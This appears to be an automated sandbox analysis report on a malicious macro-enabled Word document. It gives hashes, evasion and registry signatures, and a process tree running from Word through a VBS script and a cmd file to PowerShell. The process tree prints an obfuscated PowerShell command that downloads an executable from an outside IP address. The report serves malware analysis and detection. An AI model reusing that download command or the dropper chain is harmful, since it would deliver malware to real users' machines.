Analysis
max time kernel: 129s
max time network: 173s
platform: windows10-2004_x64
resource: win10v2004-20220414-en
submitted: 21-05-2022 12:14
Static task: static1
Behavioral task: behavioral1
  Sample: TTP-US-246841413.docm
  Resource: win7-20220414-en
Behavioral task: behavioral2
  Sample: TTP-US-246841413.docm
  Resource: win10v2004-20220414-en
General
Target: TTP-US-246841413.docm
Size: 93KB
MD5: 674d7910c1ee176de0e24fd0179d83ab
SHA1: ff11c4281f065fa38d91e606a5e294d7fd8e312d
SHA256: 567b7fe91330078fd3ba9e0f152203bb4e8edf5af0d43dd09deb7273cff24b39
SHA512: 3825964d5a19453885e521c8e79cfc086b253bbbef34467abf94bc7044cb3c89409bcdae1313ba01ab109a60961abaa960a41e3d963f45531d377186994a94b6
Malware Config
Extracted URL: http://62.108.35.26/generator.php
Signatures

Process spawned unexpected child process (1 IoC)
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
  description | pid | pid_target | process | target process
  Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process | 3632 | 2324 | explorer.exe | WINWORD.EXE

Blocklisted process makes network request (1 IoC)
Processes:
  flow | pid | process
  39 | 1760 | powershell.exe

Checks computer location settings (2 TTPs, 1 IoC)
Looks up country code configured in the registry, likely geofence.
Processes:
  description | ioc | process
  Key value queried | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation | WScript.exe

Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

Checks processor information in registry (2 TTPs, 3 IoCs)
Processor information is often read in order to detect sandboxing environments.
Processes:
  description | ioc | process
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | WINWORD.EXE
  Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | WINWORD.EXE
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | WINWORD.EXE

Delays execution with timeout.exe (1 IoC)
Processes:
  pid | process
  3112 | timeout.exe

Enumerates system info in registry (2 TTPs, 3 IoCs)
Processes:
  description | ioc | process
  Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WINWORD.EXE
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | WINWORD.EXE
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WINWORD.EXE

Modifies registry class (1 IoC)
Processes:
  description | ioc | process
  Key created | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings | explorer.exe

Suspicious behavior: AddClipboardFormatListener (2 IoCs)
Processes:
  pid | process
  2324 | WINWORD.EXE
  2324 | WINWORD.EXE

Suspicious behavior: EnumeratesProcesses (2 IoCs)
Processes:
  pid | process
  1760 | powershell.exe
  1760 | powershell.exe

Suspicious use of AdjustPrivilegeToken (1 IoC)
Processes:
  description | pid | process
  Token: SeDebugPrivilege | 1760 | powershell.exe

Suspicious use of SetWindowsHookEx (4 IoCs)
Processes:
  pid | process
  2324 | WINWORD.EXE
  2324 | WINWORD.EXE
  2324 | WINWORD.EXE
  2324 | WINWORD.EXE

Suspicious use of WriteProcessMemory (10 IoCs)
Processes:
  description | pid | process | target process
  PID 2324 wrote to memory of 3632 | 2324 | WINWORD.EXE | explorer.exe
  PID 2324 wrote to memory of 3632 | 2324 | WINWORD.EXE | explorer.exe
  PID 1800 wrote to memory of 1604 | 1800 | explorer.exe | WScript.exe
  PID 1800 wrote to memory of 1604 | 1800 | explorer.exe | WScript.exe
  PID 1604 wrote to memory of 2652 | 1604 | WScript.exe | cmd.exe
  PID 1604 wrote to memory of 2652 | 1604 | WScript.exe | cmd.exe
  PID 2652 wrote to memory of 1760 | 2652 | cmd.exe | powershell.exe
  PID 2652 wrote to memory of 1760 | 2652 | cmd.exe | powershell.exe
  PID 2652 wrote to memory of 3112 | 2652 | cmd.exe | timeout.exe
  PID 2652 wrote to memory of 3112 | 2652 | cmd.exe | timeout.exe
Processes (nested by depth in the process tree)

- C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
  Command line: "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\TTP-US-246841413.docm" /o ""
  - Checks processor information in registry
  - Enumerates system info in registry
  - Suspicious behavior: AddClipboardFormatListener
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory

  - C:\Windows\explorer.exe
    Command line: explorer.exe C:\ProgramData\jKLMJKGtftftyJHGFTYDA.vbs
    - Process spawned unexpected child process

- C:\Windows\explorer.exe
  Command line: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
  - Modifies registry class
  - Suspicious use of WriteProcessMemory

  - C:\Windows\System32\WScript.exe
    Command line: "C:\Windows\System32\WScript.exe" "C:\ProgramData\jKLMJKGtftftyJHGFTYDA.vbs"
    - Checks computer location settings
    - Suspicious use of WriteProcessMemory

    - C:\Windows\system32\cmd.exe
      Command line: C:\Windows\system32\cmd.exe /c ""C:\AsusSupport\KreuitrsfYRgryFVFt5.cmd" "
      - Suspicious use of WriteProcessMemory

      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Command line: POWerShell ("Ne"w-Object Net.WebClient")"."Dow"nloadFile"('"http://62.108.35.26/generator.php', 'C:\AsusSupport\Kilskhdeuyrg.exe')
        - Blocklisted process makes network request
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken

      - C:\Windows\system32\timeout.exe
        Command line: TIMEOUT /T 10
        - Delays execution with timeout.exe
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads

C:\AsusSupport\KreuitrsfYRgryFVFt5.cmd
  Filesize: 21KB
  MD5: 408f33dd378d96e4ccd439f05370c3e9
  SHA1: 1da9b505753f4c3c9b7d175e181f383317455256
  SHA256: 193f23ad0bd0e9076fd0370f89bed6f48d7f72fa34b40679fcde1c5d2bc88227
  SHA512: f1b3db9cef3e949067a56af8626d7422900d153277a9824ab64a471411092fcc2b44e79326e4e4446938875e769da170ef5b37618f820b0b96b9d522d4140337

C:\ProgramData\OIUTFuy
  Filesize: 4KB
  MD5: f68f78d0cdd0be34785eba37ae4787d3
  SHA1: fdc6a82309b966af80d03db8557a98f50ed57bcf
  SHA256: e2eb68d537314b4fceb6aeee6737102387e85cb0d5c06e4e8a3881dabbfef2d4
  SHA512: 2de718f4e079674db9bc1b0f67a43f28941623f0d8c1246120feefe372e7d9b2608fe78e223eff8c6d75731763fd66d29ecec1ee158c7430cefc6723e84d9cbd

C:\ProgramData\jKLMJKGtftftyJHGFTYDA.vbs
  Filesize: 89KB
  MD5: cbda7ec492b04a9a0258ad89779fd397
  SHA1: 3e8e0c1a59019994beaa1f5362034c3e3580a0ef
  SHA256: 21d108ef69fe0403a46c053c72e9a5b93a11d42cb2f1c098c6be762cfdda5f7e
  SHA512: 00f10131f1065c0b4b7df6f9ca2b20b2835c2e478d1116d7bc29a6d16bf8f6191055ab7da0572de32aadd111bf69958d6ffea1046c723c47cf53ab8127807d7e

Memory dumps:
  memory/1604-140-0x0000000000000000-mapping.dmp
  memory/1760-146-0x00007FF8E5710000-0x00007FF8E61D1000-memory.dmp (Filesize: 10.8MB)
  memory/1760-145-0x00000254F3530000-0x00000254F3552000-memory.dmp (Filesize: 136KB)
  memory/1760-144-0x0000000000000000-mapping.dmp
  memory/2324-134-0x00007FF8D0890000-0x00007FF8D08A0000-memory.dmp (Filesize: 64KB)
  memory/2324-137-0x000001C3EC190000-0x000001C3EC194000-memory.dmp (Filesize: 16KB)
  memory/2324-136-0x00007FF8CDFC0000-0x00007FF8CDFD0000-memory.dmp (Filesize: 64KB)
  memory/2324-135-0x00007FF8CDFC0000-0x00007FF8CDFD0000-memory.dmp (Filesize: 64KB)
  memory/2324-130-0x00007FF8D0890000-0x00007FF8D08A0000-memory.dmp (Filesize: 64KB)
  memory/2324-133-0x00007FF8D0890000-0x00007FF8D08A0000-memory.dmp (Filesize: 64KB)
  memory/2324-132-0x00007FF8D0890000-0x00007FF8D08A0000-memory.dmp (Filesize: 64KB)
  memory/2324-131-0x00007FF8D0890000-0x00007FF8D08A0000-memory.dmp (Filesize: 64KB)
  memory/2652-142-0x0000000000000000-mapping.dmp
  memory/3112-147-0x0000000000000000-mapping.dmp
  memory/3632-138-0x0000000000000000-mapping.dmp